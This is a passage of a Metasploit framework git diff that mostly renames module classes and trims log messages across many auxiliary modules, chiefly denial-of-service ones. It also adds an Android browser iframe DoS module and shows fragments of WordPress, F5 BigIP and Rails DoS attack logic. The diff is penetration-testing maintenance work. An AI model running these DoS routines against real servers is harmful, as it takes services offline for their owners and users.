b/modules/auxiliary/analyze/jtr_linux.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary formats = [ 'md5', 'des', 'bsdi'] if datastore['Crypt'] - format << 'crypt' + formats << 'crypt' end cracker = new_john_cracker diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 45980b7cbe..dd3312009e 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index 246a7c9cb1..17e54cc9c2 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index e41d6ff806..781574011f 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb index 5b0053951b..81f1549aaf 100644 --- a/modules/auxiliary/analyze/jtr_postgres_fast.rb +++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary #Included to grab the john.pot and use some utiltiy functions include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index d63e805904..0225b81347 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 4757cbae8e..e5c907720b 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 9e6831e2f3..a5f76cdeb4 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # # This module sends email messages via smtp diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 7eb6ab4a4b..991f98e23d 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -17,7 +17,7 @@ require 'rinda/tuplespace' require 'pathname' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 5c047d181f..81fc69dd76 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/dos/android/android_stock_browser_iframe.rb b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb new file mode 100644 index 0000000000..9221626ed9 --- /dev/null +++ b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb @@ -0,0 +1,62 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Android Stock Browser Iframe DOS", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with Android 4.0.3. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Jean Pascal Pereira', # Original exploit discovery + 'Jonathan Waggoner' # Metasploit module + ], + 'References' => [ + [ 'PACKETSTORM', '118539'], + [ 'CVE', '2012-6301' ] + ], + 'DisclosureDate' => "Dec 1 2012", + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index ff25f23634..bfab3a37ac 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index f9b0933648..786f2c16eb 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/dns/bind_tkey.rb b/modules/auxiliary/dos/dns/bind_tkey.rb index 4b29d365b7..841db2cee5 100644 --- a/modules/auxiliary/dos/dns/bind_tkey.rb +++ b/modules/auxiliary/dos/dns/bind_tkey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index cef333391d..93b149e2fc 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index 11029de675..a92ee46946 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index 99218cc07b..4978f58c29 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb index ae5709b7d7..53b773fbb1 100644 --- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb +++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb @@ -5,8 +5,11 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 23), 'auxiliary/dos/android/android_stock_browser_iframe') def initialize(info = {}) super( diff --git a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb index 28542774fb..ea62711de1 100644 --- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb +++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos @@ -67,7 +67,7 @@ class Metasploit4 < Msf::Auxiliary c.send_request(r) # Don't wait for a response rescue ::Rex::ConnectionError => exception - print_error("#{peer} - Unable to connect: '#{exception.message}'") + print_error("Unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index da932d94c9..0309563629 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index 4855af2930..92914f2613 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb index 0974305d95..ad3d15abb9 100644 --- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb +++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/canon_wireless_printer.rb b/modules/auxiliary/dos/http/canon_wireless_printer.rb index f13ad89ffe..ebb8d96f9f 100644 --- a/modules/auxiliary/dos/http/canon_wireless_printer.rb +++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 6f13cb2ca0..fb2e4c8ca7 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index e935e91cc2..9eb5b5a507 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) @@ -56,27 +55,27 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi('method' => 'GET', 'uri' => '/') unless res - print_error("#{peer} - No answer from the BigIP server") + print_error("No answer from the BigIP server") return end # Simple test based on HTTP Server header to detect BigIP virtual server server = res.headers['Server'] unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack - print_error("#{peer} - BigIP virtual server was not detected. Please check options") + print_error("BigIP virtual server was not detected. Please check options") return end - print_status("#{peer} - Starting DoS attack") + print_status("Starting DoS attack") # Start attack limit.times do |step| if step % 100 == 0 - print_status("#{peer} - #{step * 100 / limit}% accomplished...") + print_status("#{step * 100 / limit}% accomplished...") end res = send_request_cgi('method' => 'GET', 'uri' => '/') if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/ - print_good("#{peer} - DoS accomplished: The maximum number of concurrent user sessions has been reached.") + print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.") return end end @@ -84,18 +83,18 @@ class Metasploit3 < Msf::Auxiliary # Check if attack has failed res = send_request_cgi('method' => 'GET', 'uri' => uri) if res.headers['Location'] =~ /\/my.policy/ - print_error("#{peer} - DoS attack failed. Try to increase the RLIMIT") + print_error("DoS attack failed. Try to increase the RLIMIT") else - print_status("#{peer} - Result is undefined. Try to manually determine DoS attack result") + print_status("Result is undefined. Try to manually determine DoS attack result") end rescue ::Errno::ECONNRESET - print_error("#{peer} - The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") + print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") rescue ::Rex::ConnectionRefused - print_error("#{peer} - Unable to connect to BigIP") + print_error("Unable to connect to BigIP") rescue ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect to BigIP. Please check options") + print_error("Unable to connect to BigIP. Please check options") rescue ::OpenSSL::SSL::SSLError - print_error("#{peer} - SSL/TLS connection error") + print_error("SSL/TLS connection error") end end diff --git a/modules/auxiliary/dos/http/gzip_bomb_dos.rb b/modules/auxiliary/dos/http/gzip_bomb_dos.rb index a96f05e1b4..ecd3a5dd0e 100644 --- a/modules/auxiliary/dos/http/gzip_bomb_dos.rb +++ b/modules/auxiliary/dos/http/gzip_bomb_dos.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' require 'stringio' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) diff --git a/modules/auxiliary/dos/http/hashcollision_dos.rb b/modules/auxiliary/dos/http/hashcollision_dos.rb index 59d7e7370a..bc61b28bfb 100644 --- a/modules/auxiliary/dos/http/hashcollision_dos.rb +++ b/modules/auxiliary/dos/http/hashcollision_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/monkey_headers.rb b/modules/auxiliary/dos/http/monkey_headers.rb index 2f6c097029..7915eec2f4 100644 --- a/modules/auxiliary/dos/http/monkey_headers.rb +++ b/modules/auxiliary/dos/http/monkey_headers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index b69b8872f1..fa089a17be 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Watch out, dos all the things include Msf::Auxiliary::Scanner @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if check_host(ip) == Exploit::CheckCode::Vulnerable dos_host(ip) else - print_status("#{peer} - Probably not vulnerable, will not dos it.") + print_status("Probably not vulnerable, will not dos it.") end end @@ -72,17 +72,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.body.length - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Errno::EPIPE, ::Timeout::Error # Same exceptions the HttpClient mixin catches end - print_status("#{peer} - DOS request sent") + print_status("DOS request sent") end def potential_static_files_uris diff --git a/modules/auxiliary/dos/http/nodejs_pipelining.rb b/modules/auxiliary/dos/http/nodejs_pipelining.rb index 9f3181a0aa..b07ff1741c 100644 --- a/modules/auxiliary/dos/http/nodejs_pipelining.rb +++ b/modules/auxiliary/dos/http/nodejs_pipelining.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb index efb942abe9..a0cfd4437b 100644 --- a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb +++ b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Triggering a heap overflow to cause DoS...") + print_status("Triggering a heap overflow to cause DoS...") begin res = send_request_cgi( @@ -57,16 +57,16 @@ class Metasploit3 < Msf::Auxiliary 'data' => message }) rescue ::Errno::ECONNRESET - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") return end if res - print_error("#{peer} - NFR Agent didn't die, it still answers...") + print_error("NFR Agent didn't die, it still answers...") return end - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") end end diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb index 92c685a1aa..92cccd67d7 100644 --- a/modules/auxiliary/dos/http/rails_action_view.rb +++ b/modules/auxiliary/dos/http/rails_action_view.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb index 40123ce208..2dc123ecea 100644 --- a/modules/auxiliary/dos/http/rails_json_float_dos.rb +++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos @@ -75,11 +75,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status "#{peer} - Using digit pattern of #{digit_pattern} taken to #{multiplier} places" + print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places" sploit = '[' sploit << evil_float_string sploit << ']' - print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" + print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" target_available = true begin @@ -91,19 +91,19 @@ class Metasploit3 < Msf::Auxiliary 'data' => sploit }) rescue ::Rex::ConnectionRefused - print_error "#{peer} - Unable to connect. (Connection refused)" + print_error "Unable to connect. (Connection refused)" target_available = false rescue ::Rex::HostUnreachable - print_error "#{peer} - Unable to connect. (Host unreachable)" + print_error "Unable to connect. (Host unreachable)" target_available = false rescue ::Rex::ConnectionTimeout - print_error "#{peer} - Unable to connect. (Timeout)" + print_error "Unable to connect. (Timeout)" target_available = false end return unless target_available - print_status "#{peer} - Checking availability" + print_status "Checking availability" begin res = send_request_cgi({ 'method' => verb, @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Auxiliary target_available = false end rescue ::Rex::ConnectionError, Errno::ECONNRESET - print_good "#{peer} - DoS appears successful (Host unreachable)" + print_good "DoS appears successful (Host unreachable)" target_available = false end return unless target_available - print_status "#{peer} - Target is still responsive, DoS was unsuccessful." + print_status "Target is still responsive, DoS was unsuccessful." end end diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index e90f6bec2d..0db48a5fcb 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok. diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index 4329b358db..38dc4e8948 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index 258f134c4b..70e9ec24cc 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary def user_exists(user) exists = wordpress_user_exists?(user) if exists - print_good("#{peer} - Username \"#{username}\" is valid") + print_good("Username \"#{username}\" is valid") report_cred( ip: rhost, port: rport, @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary return true else - print_error("#{peer} - \"#{user}\" is not a valid username") + print_error("\"#{user}\" is not a valid username") return false end end @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary def run if wordpress_and_online? if validate_user - print_status("#{peer} - Checking if user \"#{username}\" exists...") + print_status("Checking if user \"#{username}\" exists...") unless user_exists(username) print_error('Aborting operation - a valid username must be specified') return @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary starting_thread = 1 while starting_thread < rlimit do ubound = [rlimit - (starting_thread - 1), thread_count].min - print_status("#{peer} - Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") + print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") threads = [] 1.upto(ubound) do |i| @@ -133,20 +133,20 @@ class Metasploit3 < Msf::Auxiliary begin wordpress_login(username, Rex::Text.rand_text_alpha(plength), timeout) rescue => e - print_error("#{peer} - Timed out during request #{(starting_thread - 1) + i}") + print_error("Timed out during request #{(starting_thread - 1) + i}") end end end threads.each(&:join) - print_good("#{peer} - Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") + print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") starting_thread += ubound end if wordpress_and_online? - print_error("#{peer} - FAILED: #{target_uri} appears to still be online") + print_error("FAILED: #{target_uri} appears to still be online") else - print_good("#{peer} - SUCCESS: #{target_uri} appears to be down") + print_good("SUCCESS: #{target_uri} appears to be down") end else print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress") diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb index 489458a65e..3bced8e4a6 100644 --- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary # try out the available memory in steps # apache will return a server error if the limit is reached while memory_to_use < 1024 - vprint_status("#{peer} - trying memory limit #{memory_to_use}MB") + vprint_status("trying memory limit #{memory_to_use}MB") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary # low timeout because the server error is returned immediately res = send_request_cgi(opts, timeout = 3) rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") break end if res && res.code == 500 # limit reached, return last limit last_limit = memory_to_use - fingerprint_step - vprint_status("#{peer} - got an error - using limit #{last_limit}MB") + vprint_status("got an error - using limit #{last_limit}MB") return last_limit else memory_to_use += fingerprint_step @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary end # no limit can be determined - print_warning("#{peer} - can not determine limit, will use default of #{default_limit}") + print_warning("can not determine limit, will use default of #{default_limit}") return default_limit end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary } space_to_fill = size_bytes - empty_xml.size - vprint_status("#{peer} - max XML space to fill: #{space_to_fill} bytes") + vprint_status("max XML space to fill: #{space_to_fill} bytes") payload = "&#{entity};" * (space_to_fill / 6) entity_value_length = space_to_fill - payload.length @@ -148,15 +148,15 @@ class Metasploit3 < Msf::Auxiliary def run # get the max size - print_status("#{peer} - trying to fingerprint the maximum memory we could use") + print_status("trying to fingerprint the maximum memory we could use") size = fingerprint - print_status("#{peer} - using #{size}MB as memory limit") + print_status("using #{size}MB as memory limit") # only generate once xml = generate_xml(size) for x in 1..rlimit - print_status("#{peer} - sending request ##{x}...") + print_status("sending request ##{x}...") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Auxiliary c.send_request(r) # Don't wait for a response, can take very long rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index 4cf177b852..2de44aae5d 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/dopewars.rb b/modules/auxiliary/dos/misc/dopewars.rb index e21ccb27b4..2c83a27686 100644 --- a/modules/auxiliary/dos/misc/dopewars.rb +++ b/modules/auxiliary/dos/misc/dopewars.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb index c6f8a24995..faf1cceed4 100644 --- a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos @@ -81,37 +81,37 @@ class Metasploit3 < Msf::Auxiliary def run # inform user of action currently selected - print_status("#{peer} - Action: #{action.name} selected") + print_status("Action: #{action.name} selected") # CHECK action if action.name == 'CHECK' - 